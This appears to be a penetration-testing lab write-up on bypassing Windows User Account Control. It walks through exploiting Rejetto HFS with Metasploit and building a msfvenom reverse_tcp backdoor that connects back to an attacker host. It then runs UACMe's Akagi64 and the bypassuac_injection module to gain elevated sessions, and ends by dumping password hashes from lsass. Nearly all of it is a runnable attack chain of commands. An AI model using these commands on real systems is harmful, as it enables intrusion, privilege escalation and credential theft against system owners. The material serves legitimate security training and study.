Bypassing UAC

User Account Control (UAC) is a Windows security feature introduced in Windows Vista to prevent unauthorized system changes. It ensures that any modification to the operating system requires approval from an administrator or a user with administrative privileges.

• Non-privileged users executing programs with elevated privileges will receive a UAC credential prompt.

• Privileged users will see a UAC consent prompt before the action is approved.

Bypassing

To bypass UAC, an attacker needs access to a local administrator account on the target system.

• UAC prompts users before executing programs with administrative rights.

• UAC operates at different integrity levels (Low to High). If set below High, certain programs can execute without user confirmation.

• Various tools and techniques can be used to bypass UAC, depending on the Windows version.

UACMe

UACMe is an open-source and powerful privilege escalation tool. It automates UAC bypass techniques to execute processes with elevated privileges without triggering UAC prompts.

It provides a comprehensive and well-documented list of methods for bypassing UAC across multiple Windows versions, from Windows 7 to Windows 10. By exploiting the built-in Windows AutoElevate tool, it enables attackers to execute malicious payloads on a target system with administrative or elevated privileges.

## TARGET MACHINE

# Lists all user accounts on the system. This command helps identify available user accounts, including standard and administrator accounts.
net users

# Displays the members of the local Administrators group.
net localgroup administrators

## ATTACKER MACHINE

nmap [TARGET IP]

# w/ Metasploit
msfconsole
setg RHOSTS [TARGET IP]
search rejetto
use exploit/windows/http/rejetto_hfs_exec
show options
exploit

## TARGET MACHINE using meterpreter

# target machine local enumeration
sysinfo
pgrep explorer / ps -S explorer.exe
migrate 2448
getsystem # elevation check
getuid
getprivs
shell
net user
net localgroup administrators

## ATTACKER MACHINE

# using UACMe
# Source > Akagi
# Default Settings required. Run executable from command line: 
akagi32 [Key] [Param] 
# or 
akagi64 [Key] [Param]
# First parameter is number of method to use, second is optional command (executable file name including full path) to run. Second parameter can be empty - in this case program will execute elevated cmd.exe from system32 folder.
# binary needs to be compiled

# meterpreter payload > upload that to the target > bypass UAC to execute this
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACKER IP] LPORT=[PORT] -f exe > backdoor.exe

# multi handler setup
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [ATTACKER IP]
set LPORT [PORT]
exploit

## TARGET MACHINE using meterpreter

pwd
getuid
getprivs
cd C:\\
mkdir Temp
cd Temp
upload backdoor.exe
upload Akagi64.3xe
Akagi64.exe 23 backdoor.exe

# new meterpreter session with elevated privilege in the handler

I started by gathering basic information on the target machine, listing all user accounts (net users) and identifying members of the Administrators group (net localgroup administrators). Then, from the attacker machine, I scanned the target using Nmap to identify open ports and services.

I leveraged Metasploit to exploit the Rejetto HFS vulnerability, gaining an initial foothold on the target. Once inside, I used Meterpreter to enumerate system details (sysinfo), check running processes (pgrep explorer), migrate to a stable process, and verify privileges.

To escalate privileges, I utilized UACMe, an open-source privilege escalation tool, to bypass User Account Control (UAC). I created a Meterpreter payload using msfvenom, uploaded it to the target machine, and executed it with elevated privileges using UACMe (Akagi64.exe 23 backdoor.exe).

Finally, I set up a multi-handler on Metasploit to catch the reverse shell connection from the backdoor, successfully establishing a new Meterpreter session with elevated privileges on the target.

Memory Injection w/ Metasploit

use exploit/windows/local/bypassuac_injection
set session 1
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

getsystem
getuid

ps -S lsass.exe
migrate 484

hashdump

I used the bypassuac_injection exploit to escalate privileges on a Windows machine. After setting the session and payload, I executed the exploit.

Once inside, I ran getsystem to gain SYSTEM privileges and confirmed my user identity with getuid.

Next, I listed processes searching for lsass.exe and migrated to its PID (484) for stability. Finally, I dumped password hashes using hashdump for credential extraction.